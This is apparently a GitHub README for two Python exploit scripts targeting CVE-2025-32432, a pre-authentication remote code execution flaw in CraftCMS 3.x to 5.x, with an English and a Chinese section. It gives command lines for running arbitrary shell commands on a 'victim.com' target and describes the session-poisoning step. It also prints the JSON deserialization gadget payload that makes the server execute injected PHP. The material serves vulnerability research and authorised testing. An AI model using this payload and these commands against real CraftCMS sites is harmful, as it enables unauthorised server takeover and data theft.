# CVE-2025-32432 Exploit Scripts (Python PoC)
> **Pre-auth Remote Code Execution for CraftCMS 3.x / 4.x / 5.x**
> **PoC Maintainer:** C.T.Y. (research use only)
> **Vulnerability Discovery:** Nicolas Bourras – Orange Cyberdefense
> **Additional PoC Inspiration:** SensePost research & Chirag Artani’s public script
---
## 1. Overview
This repository bundles two complementary Python exploits for **CVE-2025-32432** — a pre-authentication RCE in CraftCMS’ asset-transform endpoint.
| Script | Purpose |
| --------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `craftcms_rce_php_check.py` | _Safety probe_ — sends **one request** using the **`FnStream`** gadget to verify whether arbitrary PHP executes (prints `phpinfo()` output). Ideal for low-impact confirmation. |
| `craftcms_final_payload.py` | _Full exploit_ — **two-packet chain**: first implants PHP via `FnStream`, then leverages the **`FieldLayoutBehavior → PhpManager`** gadget to execute **any shell command**. |
> The second script is the one described throughout this README.
> The first script is included for completeness and quick validation, courtesy of **Chirag Artani** — see _Credits_.
> _Script filename was adapted for clarity; original structure & idea by Chirag Artani._
---
## 2. Disclaimer 🚨
For **educational & authorised security testing** only.
Using these scripts against systems **without explicit written permission** is **illegal and unethical**.
---
## 3. Features (final payload)
- One-shot **two-packet** RCE
- Automatic `assetId` brute-force (`404 → 302` heuristic)
- Custom shell-command execution (`-c/--cmd`)
- Works over HTTP **or** HTTPS (SSL-verification warnings suppressed)
- Clean extraction of command output from HTML response
---
## 4. Requirements
- Python **3.8+**
- PyPI packages (install via `pip install -r requirements.txt`):
- `requests`
- `urllib3`
---
## 5. Installation
```bash
# Clone the repo
git clone https://github.com/yourname/CVE-2025-32432-2pkt.git
cd CVE-2025-32432-2pkt
# Install dependencies
pip install -r requirements.txt
```
---
## 6. Usage
### 6.1 Quick PHP-exec Check
```bash
python3 craftcms_rce_php_check.py -u https://victim.com
```
If you see `phpinfo()` output, the target is very likely exploitable.
### 6.2 Full Two-Packet Exploit
```bash
python3 craftcms_final_payload.py -u https://victim.com -c "id"
```
#### Options
| Option | Long form | Description | Required |
| ------ | ------------ | ----------------------------------- | -------- |
| `-u` | `--url` | Target base URL (no trailing slash) | ✅ |
| `-c` | `--cmd` | Shell command to run | ✅ |
| `-a` | `--asset` | Known good `assetId` | ❌ |
| `-s` | `--scan-max` | Brute limit (default: 300) | ❌ |
---
## 7. How the Vulnerability Works (recap)
- **Session Poisoning** — GET to `/index.php?p=admin/dashboard&a=<?=...?>` writes arbitrary PHP into `/tmp/sess_<ID>`.
- **Deserialisation Gadget** — POST to `actions/assets/generate-transform` with a `FieldLayoutBehavior → PhpManager` gadget forces CraftCMS to `require()` the session file, executing the code.
```json
{
"assetId": 11,
"handle": {
"width": 1,
"height": 1,
"as hack": {
"class": "craft\\behaviors\\FieldLayoutBehavior",
"__class": "yii\\rbac\\PhpManager",
"__construct()": [
{
"itemFile": "/tmp/sess_<SessionID>"
}
]
}
}
}
```
---
## 8. Tested Versions
- CraftCMS < 3.9.15 (requires `assetId` brute-force)
- CraftCMS < 4.14.15
- CraftCMS < 5.6.17
---
## 9. References & Further Reading
- [Original Advisory — Nicolas Bourras / Orange Cyberdefense](https://orangecyberdefense.com)
- [SensePost Deep-Dive Blog](https://sensepost.com)
- [Chirag Artani’s PoC](https://github.com/Sachinart/CVE-2025-32432)
- [CraftCMS Security Advisory](https://craftcms.com/knowledge-base/security-advisories)
- [CVE-2025-32432 @ MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32432)
---
## 10. Credits
- **C.T.Y.** — Full two-packet PoC & documentation
- **Chirag Artani** — Original `phpinfo` check script (`craftcms_rce_php_check.py`) and early research ideas
_Script filename was adapted for clarity; original structure & idea by Chirag Artani._
- **Nicolas Bourras / Orange Cyberdefense** — Vulnerability discovery and responsible disclosure
- Additional insights from **SensePost** research team
---
## 11. License
> **Responsibility Notice:**
> Any legal risks or damages arising from the use of this code are solely the responsibility of the user.
MIT License — see `LICENSE`.
---
# 中文說明
## 1. 專案內容
| 檔案 | 用途 |
| --------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `craftcms_rce_php_check.py` | **PHP 執行可行性檢查**:單一請求,使用 `FnStream` 觸發 `phpinfo()`,以低影響方式驗證目標是否易受攻擊。<br/>_此檔案名稱為說明用途而調整,原始概念與程式架構來自 Chirag Artani。_ |
| `craftcms_final_payload.py` | **兩包鏈完整利用**:先以 `FnStream` 植入 PHP,再透過 `PhpManager` 執行任意指令。 |
---
## 2. 免責聲明
僅供教學與合法授權測試使用。未經授權操作即屬違法。
---
## 3. 快速檢查
```bash
python3 craftcms_rce_php_check.py -u https://目標站
```
---
## 4. 完整利用
```bash
python3 craftcms_final_payload.py -u https://目標站 -c "id"
```
參數與英文版相同。
---
## 5. 致謝
- **Chirag Artani** — `phpinfo` 檢查腳本
_此檔案名稱為說明用途而調整,原始概念與程式架構來自 Chirag Artani。_
- **Nicolas Bourras / Orange Cyberdefense** — 漏洞發現與技術靈感
- **SensePost** — 技術靈感
---
## 6. 授權
> 使用本程式碼造成之任何法律風險與損失,由使用者自行承擔。
MIT License
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view